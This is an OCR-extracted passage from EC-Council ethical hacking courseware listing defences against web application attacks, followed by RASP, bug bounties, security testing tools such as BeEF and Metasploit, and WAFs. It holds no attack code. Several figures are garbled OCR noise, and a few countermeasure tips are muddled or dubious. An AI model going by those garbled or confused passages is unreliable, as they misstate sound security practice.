o Use virus and malware scanning software to protect the browser from any malicious
scripts that hijack the cookies.
o Clear stored cookies from the browser regularly.
o Employ cookie randomization to change the website or a service cookie when ever
the user makes a request.
o Use a VPN that adopts high-grade encryption and traffic routing to prevent session
sniffing.
o Restrict multipurpose cookies to ensure that a single task is assigned for an
individual cookie.
o Ensure that HTTPS communication is used to secure the flow of information.
o Enable synchronous session management to enhance cookie security.
o Avoid using generators for cre ating session identifiers.
■ Web Service Attack
Use multiple layer protection and standard HTTP authentication techniques to defend
against web service attacks. Because most models incorporate business-to-business
applications, it becomes easier to restrict access to only valid users.

Module 14 Page 2177 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Some additional countermeasures against web service attacks are as follows:

o Configure WSDL Access Control Permissions to grant or deny access to any type of
WSDL-based SOAP messages.
o Use document-centric authentication credentials that use SAML.
o Use multiple security credentials such as X.509 Cert, SAML assertions, and WS-
Security.
o Deploy web-service-capable firewalls that can perform of SOAP- and ISAPl-level
filtering.
o Configure firewalls/IDS systems for anomaly and signature detection for web
services.
o Configure firewalls/IDS systems to filter improper SOAP and XML syntax.

o Implement centralized in-line requests and response schema validation.

o Block external references and use pre-fetched content when de-referencing URLs.
o Maintain and update a secure repository of XML schemas.
o Use password digests/Kerberos tickets/X.509 certificates in SOAP headers for
authentication.
o Use a digital signature for signing messages at the recipient's end and maintain the
integrity of the messages.
o Use URL authorization to restrict access to the web service file (.asmx).
o Authorize access to WSDL files using NTFS permissions.
o Disable the documentation protocols to prevent the dynamic generation of WSDL.
o Verify the caller's endpoint in the SOAP message before determining whether the
SOAP message is processed by the BPEL engine .
o Disable the SOAP Action field such as createUser or deleteUser in the HTTP request.
o Avoid using easily guessable SOAP Action terminologies.
o Disable the SOAPAction attribute when not in use.
o Compare the operation within the SOAPAction and the SOAP body.
o Disable WS-Addressing completely. If WS-Addressing is strictly required, then create
a whitelist of allowed addresses.
o Use an XML proxy to hide internal configuration information, which can be revealed
by web services.
o Implement XSLT to enable XML address translation for converting outgoing XML
messages.
o Use TLS to secure SOAP communication and follow the same encoding for the client
and server.

Module 14 Page 2178 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is St rictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Ensure that web services are compliant with Web Services Interoperability (WS-1).
• Clickjacking Attack
o Use a server-side method such as X-Frame-Options header and use its options DENY,
SAMEORIGIN, and ALLOW-FROM URI to prevent the site from being framed outside
the domain.
o Never use client-side methods such as Framebusting or Framebreaking as they can
be bypassed easily.
o Mask the HTML document and reveal it only after verifying that the page is not
framed.
o Use the Content-Security-Policy (CSP) HTTP header as it provides considerable
flexibility for defining sources in complex deployments.
o Use the SameSite cookie attribute to prevent session cookies from being included
when the web page is loaded in a frame.
o Frequently run a web vulnerability scanner to detect and remove clickjacking
vulnerabilities.
o Employ Auth0 as it protects its universal login page from clickjacking attacks by
sending both X-Frame-Options and CSP headers.
o Employ a UI defensive program to confirm that the current frame is the highest-level
window.
o Use window. confirm () protection, which informs users of the action they will
perform.
• JavaScript Hijacking
o Use .innerText rather than .innerHTML in JavaScript to encode the text
automatically.
o Avoid using the eval function due to its vulnerable nature.
o Do not write serialization code.
o Use the encoding library to safeguard the attributes and data elements and avoid
building XML dynamically.
o Use SSL/TLS for secure communication and perform encryption on the server
instead of the client-side code.
o Build XML using any appropriate framework; avoid building XML manually.
o Make sure to return JSON with an object externally, such as {"result": [{"object":"
inside array"}]}.
o Maintain proper and unique URLs for each session that recovers JSON objects.
o Ensure that no confidential data from the server are transmitted to the client side
using JSON objects.

Module 14 Page 2179 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Employ Al-based JavaScript monitoring for all ongoing sessions to sniff unwanted
actions and malicious patterns.
o Maintain a proper tree-based lifecycle of JavaScript libraries to conduct deep
analysis to check for any modifications.
o Enable the sub-resource integration feature to detect any modifications to the
JavaScript code.
o Use JavaScript analyzers to analyze the code in client-side applications for any
vulnerabilities or errors.
• Username Enumeration
o Ensure that inputs that include user identifiers produce outputs containing only
generic error messages.
o Use randomly generated data for usernames instead of sequential numbers.
o Employ proper defenses against SQL injection and XSS attacks to prevent dumpable
user enumeration .
o Always make sure to apply CAPTCHA to all the input accepting pages to prevent
automatic data collection.
o Use a WAF to detect and block all the individual IP addresses that try to make
several requests.
o Apply two-factor authentication (2FA) or padding techniques to the response time
to prevent username enumeration.
o Use random and complex usernames when creating the Active Directory username
list.
o Always use only complex and difficult-to-guess passwords and change the default
usernames and passwords.
o Harden all the services to avoid establishing null bind and prevent remote root
authentication .
o Avoid informing users that a given username has already been registered on the
website.
o Ensure the usernames on your "Forgot Password" web page are hidden.
o Implement rate limiting to prevent username enumeration attacks, which can block
requests from a certain IP address after three failed login attempts.
o Employ geo limiting to gather the location of a user during registration and validate
login attempts.
o Return the same response for failed login attempts to prevent username
enumeration, e.g., "The username or password is not valid."

Module 14 Page 2180 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Attack on Password Reset Mechanism

o Perform proper validation of random token and email link combination before
executing the request.
o Ensure that all password reset URLs are used only once and set an expiry time limit.
o Avoid automated requests through programs and enforce human checks using the
CAPTCHA.

o Restrict the number of requests generated from any IP or device within a stipulated
time.
o Use advanced multi-factor authentication (MFA) techniques to prevent account
hijacking with password reset tokens.
o Ensure that the URLs for password reset use HTTPS.
o Send a temporary password via the registered email address, instead of directly
resetting the password .
■ Same-Site Attacks
o Implement dangling domain records as a validation mechanism.
o Enable a DNS misconfiguration verification and validation process.
o Duly update DNS records on the corresponding DNS server.
o Educate users on CNAME DNS entry verification and its impacts.

Module 14 Page 2181 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

How to Defend Against Web Application Attacks

s-,
Configure the firewall Shut down the

··············► -~
u .~. ,~~~.)~~'.' ~.'.~: . .► l~LJ··· ··~~.~.7'Y'
~
I
---
■ _,..._ I 'tt/' Perform
input validation
to deny external unnecessary services

es ·=~ ·································►
Attacker Login Form Internet
Use WAF Fire wall Web Server j Keep patches
/IDS and filt er packets : curre nt

user input

~ Disable commands Perform dynamic testing :

~ like xp_cmdshell
...
Operating Sys tem
and source code analysis :
~ <··;..;:k;·;~·~~·jij;~;·~ ·l
EiJ;,-J as specific as possible
LDAP Se rver Cu stom Error Page

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

How to Defend Against Web Application Attacks

To defend against web application attacks, you can follow the countermeasures stated earlier.
To protect the web server, you can use a WAF firewall/IDS and filter packets. You also should
regularly update the server's software using patches to protect it from attackers. Sanitize and
filter the user input, analyze the source code for SQL injection, and min imize the use of third-
party applications to protect the web applications. You can also use stored procedures and
pa rameter queries to retrieve data and disable verbose error messages that can provide
attackers with useful information. Use cu stom error pages to protect the web applications. To
avoid SQL injection into the database, connect using a non-privileged account and grant the
least privileges to the database, tables, and columns. Disable commands such as xp_cmdshell,
which can affect the OS.

Module 14 Page 2182 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

·············►
--
Configure the firewall

f m, .~ ..~~~~~~~~.~~~·s·s···►
to deny external I[] Shut down the
unnecessary services

= ........~.~~.".'.'~
-·
Use WAF Firewall
=
Web Server
!"
j Keep patches
/IDS and filter packets j current

-
£ £Z
¾ g "t······".".':...
..,, Connect to the database using

~············~-~?.~:~~i~i!~~~ -~~~~t-·················
a...4 Use stored proc~dures and

Parameterquenes••••••••••• •• ••••••••• • •
. . , Grant least privileges to the
• ~···········~;~;.;;i~~~~~~,.;~~---····
.,,,
Analyzethesource
code for SQL injection

party apps
~ p
r r r ~ --···············
~

DBMS database, tables, and columns Web Application Sanitize and filter
user input
Disable commands Perform dynamic testing !
: like xp_cmdshell and source code analysis !
i'

•
Operating System
Er"
~
FJDI ~·M~k~·wAi>.rii;;~·~ .i
LDAP Server
as specific as possible
:................................. >
Disable verbose error messages
and use custom error pages

Figure 14.105: Defend against web application attacks

0
Custom Error Page

Module 14 Page 2183 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

RASP for Protecting Web Servers

Runtime application self protection (RASP) provides security to web and non-web application runn ing on a server
It can detect runtime attacks on the real-time software application layer and can provide better visibility of the
hidden vulnerabilities in the incoming traffic

RASP can perform continuous monitoring, help in re mediating attacks at an early stage, and generate minimized
false positives

RASP Benefits Internet

e Visibility r--
e Coll aboration and DevOps [[]
Server
RASP

e Penetration testing

e Incident response

SQLServer

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

RASP for Protecting Web Servers

Runtime Application Self Protection {RASP) is a technology that provides security to applications
that run on a server. RASP can be used for detecting runtime attacks on the real-time software
application layer and can provide better visibility of hidden vulnerabilities. RASP can detect any
malicious activity in the incoming traffic and also validate data requests. RASP protects both
web and non-web applications and it can be used to prevent fake programs from being
executed inside the application. RASP performs continuous monitoring to help remediate
attacks such as unknown zero-day attacks at an early stage without any human intervention.
The RASP layer is placed within the application code . It deploys by monitoring the traffic coming
into the server and applies protection mechanisms whenever threat vectors are detected. All
the requests are examined through the RASP layer present between the server and the
application without affecting the performance of the application. Furthermore, RASP can
generate minimized false positives.
Benefits of using RASP

• Visibility: RASP offers greater visibility and lets the user have a detailed view of the
application to monitor the attacks
• Collaboration and DevOps: It provides better collaboration and DevOps as it offers
transparency that can provide similar and detailed information to both security
professionals and developers
• Penetration testing: The increased visibility of RASP helps in avoiding duplicate testing.
It also provides information about successful attacks and previously tested applications

Module 14 Page 2184 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

■ Incident response: RASP supports incident response to facilitate logging for security and
compliance by letting the user report on customized events without modifying the
application

Internet

APP RASP

Server Block? y Log

SQL Server

Figure 14 .106: Overview of RASP

Module 14 Page 2185 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Bug Bounty Programs

The bug bounty program is a challenge hosted by organizations, websites, or software developers to tech-
sawy individuals or ethical hackers to participate and break into their security to report the latest bugs and
vulnerabilities

This program focuses on identifying the latest security flaws in software or any web application that most
security developers fail to detect

Individuals or ethical hackers who report the vulnerabilities are rewarded accordingly based on the severity
level of the bugs

Many organizations and companies conduct bug bounty programs to strengthen their cyber security by
patching ignored vulnerabilities

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Bug Bounty Programs

A bug bounty program is a challenge or agreement hosted by organizations, websites, or
software developers for tech-savvy individuals or ethical hackers to participate and break into
their security to report the latest bugs and vulnerabilities. This program focuses on identifying
the latest security flaws in the software or any web application that most security developers
fail to detect and which may hence pose a great threat. Therefore, individuals or ethical hackers
who report the vulnerabilities are rewarded accordingly based on the severity of the bugs.
Thus, any threat or flaw that evades the developer can be mitigated before it paves the way to
sophisticated cyber-attacks. Many white-hat hackers contribute to this program as part of a
comprehensive vulnerability disclosure framework and get rewarded for their work.
Many organizations benefit from such programs, as they need to maintain a keen watch on
their system security and identify ignored vulnerabilities. Most of the latest bugs that are not
detected by legacy security testing techniques and software tools can be exploited, resulting in
major data loss. Such programs can also help organizations to avoid loss of money and
reputation in the case of a data breach, as offering rewards through the bug bounty program is
more economical. Therefore, most of the large companies use this program for strengthening
their security, which in turn enhances websites and programs.

Module 14 Page 2186 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Application Security Testing Tools

Acunetix
Vulnerability
I Acunetix WVS checks web applications for SQL injections,
cross-site scripting, etc.
It includes advanced penetrat ion t esting tools, such as
N-StalkerWeb
App Security
N-Stalker web app security scanner checks
for vulnerabilities such as SQL injection,
Scanner Scanner XSS, and other known attacks
the HTTP editor and the HTTP Fuzzer

Asun

__
,._
•ta-
.,
,,_
~~
J _­
.. _
--

--
orn-o-

-
ro« _- . . , . .l. -
, --
- -
..,....,... _
- ...
- _

• Olodf--•IIRfY-OCl'N- ·-
.-
.,_.,
0-,-121
• ~o.,.,.-~- '==(I)
c,,-

. 0\-U.--.. . . .
•-i...._m

• _... ....,.........°""'_
I! -:::..
e~v--..------.-1
___ . -
.9--lffll'--•
•:-~..,_..,
:i.----ei-..--,.,..,._..,.
________
■ .., ----.... ..,,_-. .....
Ei,jj
~ .,,~
--~----
-------
~----
r+-lilllUfllU_,w.,-11

.......

- ~•'-- ---
-~,-- 1 1
;_.(_

https://www. ocunetix.com https://www.nstolker.com

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Application Security Testing Tools (Cont'd)

Browser Exploitation Framework (BeEF)

The browser exploitation framework (BeEF) is an open-source
[iJ Metasploit
http1://www.metasplolt.com

penetration testing tool used to t est and exploit web applications

and browser-based vulnerabilities

00
a
~£•~~...to<P•,.,.. •
PowerSploit
http1://github.com
f,o C'Q , I l\m1 • =
, ... "<l~,. . . d o""" " p., ,c\ o'"'""""''I o°""' o .., Ol,,-pP~ !'.",r-..-., ,........,,. ~1""" »

IJo' Watche r
http1://www.cosaba.com
_J
lg lnvicti
http1://www.invktLcom

https://beefproject..com
~ Arachni
http1://www.arochni-sconner.com

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Web Application Security Testing Tools

There are various web application security assessment tools available for scanning, detecting,
and assessing the vuln erabilities/security of web applications. These tools reveal their security
posture; you can use them to find ways to harden security and create robust web applications.
Furthermore, these tools automate the process of accurate web application security
assessment.

Module 14 Page 2187 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

This section discusses some web application security testing tools.

• Acunetix Vulnerability Scanner

Source: https://www.acunetix.com
Acunetix WVS checks web applications for SQL injections, cross-site scripting, etc. It
includes advanced penetration testing tools, such as HTTP Editor and HTTP Fuzzer. It
scans the ports of a web server and runs security checks against network services. It also
tests web forms and password-protected areas. Furthermore, it provides effective
vulnerability management by allowing third-party issue trackers such as Jira, Gitlab,
GitHub, and FogBugz.

@i) Scan ■ II I Generate Report • fi WAF Export y

Scan Information Vulnerabilities Site St ructure Events

T Filter X

Se-..1::- ity ,l. Vulnerability URL Parameter Stiltu~ Confidence%

e Report outdated Scan Engine/ Environment (local) 64.225.70.154:general/tcp Open

e Check if Mailserver answer to VRFY and EXPN requests 64.225.70.154:25/ tcp Open

e OpenSSH Detection Consolidation 64.2 25.70.154:genera I/ tcp Open

e OpenVAS / Green bone Vulnerability Manager Detection 64.225.70.154:9390/ tcp Open

e OS Detection Consolid ation and Reporting 64.225.70.154:general/tcp Open

e Postfix SMTP Server Detection 64.225.70.154:25/ lcp Open

e Service Detection with '<xml/ >' Request 64.225.70.154:9390/ tcp Open

e Services 64.225.70.154:22/ lcp Open

e Services 64.225.70.154:9390/ tcp Open

e Services 64.225.70.154:25/ tcp Open

Figure 14.107: Screenshot of Screenshot of Acunetix Web Vulnerability Scanner

Module 14 Page 2188 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

■ N-Stalker Web App Security Scanner

Source: https://www.nstalker.com
N-Stalker Web App Security Scanner checks for vulnerabilities such as SQL injection, XSS,
and other known attacks. It is a useful security tool for developers, system/security
administrators, IT auditors, and staff, as it incorporates the well-known " N-Stealth HTTP
Security Scanner" and its database of 39,000 web attack signatures along with a
component-oriented web application security assessment technology.

, b ffTTJ>IIIIM
Pre, r ror«

Y, SanM.r fv~ts

E ~ 5canMf ,. Vulnerab,1 ty Application might be

I Oasltbolrd
vulnerable to
see Sequfflc:4 General Info
Alowed Hosts
clickjacking attacks
Oetas and Fix
Rt,ected Hosts • Severity : Medium
BrowserOet.oiis
0 Objects
Vulnerability
·-., Cocl.les HTTP~
• Class : Cl1Clt.lade
- ~ (0) HTTP Response
r Comients OWASP (Top 10 AS) I CWE
Sl'ldabonEngne • References : (693)
...i Wel>forms CZ)
Rao Fllsr.f>osal:Ne • Target URL : httpJtwww lll0\1UCope co
E-mals
Broun pages (I) • Post Data : NJ~
HddtnFields
liformi!JOII LHllge (2)
Vunerabiltts • WIiy is II an Issue?
8 h~Jtwww - ~ eoff'i
8

[ .
Appica:IOn mg/It be wtlerable lo ~cLr>g aU.ckJ
I

Mutc,le Cross-ue requell for~ vunerablly has ~

Web fom, alows passw0<d Qc:t,ftg., Ille c6ent-side
N-Stalker has round )Our system Is
vulnerable to d1d(jaclong attaek v,nich
allows mal1dous users to manipulate
legitimate user Interactions v,,thin your
appltcabon
Fossl)le unCOll'fflOft HTTP mel!IOd found to be suppon
WebH!ver wldisc:lose plat!om, dell 0< version.,,
Webse<ver wl d&Sdou platfom, detals or vers,on "f v
. .
< > < >
,.
--- Scan Module
11-Slaler Sp,der Module
Current Total PrO(JfeH
1001'
Sc.,n MocUes I
~ Scall-aucceulllly~

Figure 14.108: Screenshot of N-Stalker W eb Ap plication Security Scanner

Module 14 Page 2189 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

■ Browser Exploitation Framework (BeEF)

Source: http://beefproject.com
The Browser Exploitation Framework (BeEF) is an open-source penetration testing tool
used to test and exploit web applications and browser-based vulnerabilities. It provides
the penetration tester with practical client-side attack vectors and leverages web
application and browser vulnerabilities to assess the security of a target and perform
further intrusions.

. -- - ' '

BeEF Control Panel X +

~ (! ~ 8 r,, 10 10 I 13 ··· 0 <.I •1\ ID "-' " s ::

) Getting SlJrted @ Stan i' Parrot OS @ Commun,ty @ Docs @Git @ Crypt Pad I E:J Privacy E:J Pentest E:J Learn I »
1i B<EF o s 4.0 I Lllolll&
Hooked Blv#sers Loge
I Onlne
Brow3CJS
cane Browsers I Type e-,,,,. Dole B<o
lker WIUI., 10.10.Lll has 9.JICCHSIUly a u ~ In the applCid0n. 202'2.0S.26 0
12..nsourc
6cEF~ S&arte<I 2022-05-26 0
12:26:53 l/TC

Baic: R......... Page I at l lllsolay,nglog< l 2ot2

Figure 14.109: Screenshot of Browser Exploit at ion Framework (BeEF)

Some additional web application security test ing tools are as follows:
■ Metasploit (https://www.metasploit.com)
■ PowerSploit (https://github.com)
■ Watcher (https://www.casaba.com)
■ lnvicti (https://www.invicti.com)
■ Arachni (https://www.arachni-scanner.com)

Module 14 Page 2190 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Application Firewalls

dotDefen der prot ect s websites from m alicious attacks 0 HCL AppScan• Standard
such as SQL injection, path traversal, cross-site https://IIIIWW.hcltechsw.com

dotDefender scripting, and others that result in w ebsite defacement

It inspects HTTP/ HTTPS t raffic for suspicious behavior

.,,,. Alteon Integrated WAF (App Wall)
https;//www.radwore.com
j
• IIITl e

QualysWAF
https://www.quotys.com

El RemoteMcnss
Lill
" 192\.168\.2\.5$.

-
"'"'
[ &Y "'""''' Wob Applka<;oo ,;,=all
httfn://www.borrocuda.com
j

Web Application Firewalls

http://www.opplicure.com
= ThreatSentry
https://www.prNocyware.com

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web application firewalls (WAFs) secure websites, web applications, and web services against
known and unknown attacks. They prevent data theft and manipulation of sensitive corporate
and customer information. Some of the most commonly used WAFs are as follows:
• dotDefender
Source: http://www.applicure.com
dotDefender™ is a software-based WAF that protects your website from malicious
attacks such as SQL injection, path traversal, cross-site scripting, and others that result
in website defacement. It complements the network firewall, IPS, and other network-
based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.

Module 14 Page 2191 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Ethical Hacker
Hacking Web Applications

, OOw e
• dotDefende, (Engine 1$ started)
0 lcense (Neve- Expies)
Rue \.i>dales (Autcmatt) Usu-Oefin•d Requ ■st Rul ■s
<Jobal 5ettnQs
OefillJt Sea.rity Plofle (Ptotection) Uh this pane 10 set custom rulff fOf your prOlection.
5eMlrMall<l'1Q
UploadFGl:l9s
Patterr'6 \ Add Ne" Rule I
CUstomRLa,s
Pararod (Hq-est SEcurlty)
B'C
Aj 92\. 168\ 2\.5$ Deny
Use Defiled l\8Sll(l'15e ltms
Best "'actl:8S /blog Deny
aAfer °'9'11ow
9'.ll. lnjeCtlOn
Cross-Site serotno
Path Traversill
Plct>n;i
COdelnjeCtlOn
Jnfam,tm LYilQO
Remote Comn.nl Executm
(odclolmpJatloo
Wl'"dows Otectores rd Fies
X1'I. Schemi
XPath lnJectloo
XPath Cross Site Soi>lrQ
Slgnatues
192.168.10.66 (Usa Oefal..lt)
• 0 wwwmitoc,lsitel.a:m (l>rotectx:n)
www.myb:aiota2.can (\.Isa Dela.ft)
www.myb:alote3.can (\.Isa Dela.ft)

Figure 14.110: Screenshot of dotDefender web application fi rewall

Some additional web application firewalls are as follows:

• HCL AppScan ®Standard (https://www.hcltechsw.com)

• Alteon Integrated WAF (AppWall) (https://www.radware.com)

■ Qualys WAF (https://www.qualys.com)

■ Barracuda Web Application Firewall (https://www.barracuda.com)

• ThreatSentry (https://www.privacyware.com)

Module 14 Page 2192 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Module Summary

□ 0 In this module, we have discussed the following:

► Web application concepts

► Various web application attacks

► Web application hacking methodology, which covers footprinting web infrastructure,

analyzing web applications, bypassing client-side controls, attack authentication
mechanisms, etc.

► Various web application hacking tools

~
► Web APls, webhooks, and web shell concepts

► Hacking web applications via web APls, webhooks, and web shells
► Various countermeasures that are to be employed to prevent web application hacking
attempts by threat actors
► Securing web applications using various security tools

0 In the next module, we will discuss in detail how attackers, as well as ethical hackers and
pen testers, perform SQL injection attacks on the target web application

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Module Summary
This module presented web application concepts. It also discussed various web application
attacks in detail. Furthermore, it described the web application hacking methodology in detail.
In addition, it illustrated various web application hacking tools. It also discussed web API,
webhooks, and web shell concepts. Moreover, it explained ways of hacking web applications via
web APls, webhooks, and web shells. Subsequently, it presented various countermeasures
against threat actors' attempts to hack web applications. Finally, it ended with a detailed
discussion on how to secure web applications using various security tools.
In the next module, we will discuss in detail how attackers as well as ethical hackers and pen
testers perform SQL injection attacks on the target web application.

Module 14 Page 2193 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
This page is intentionally left blank.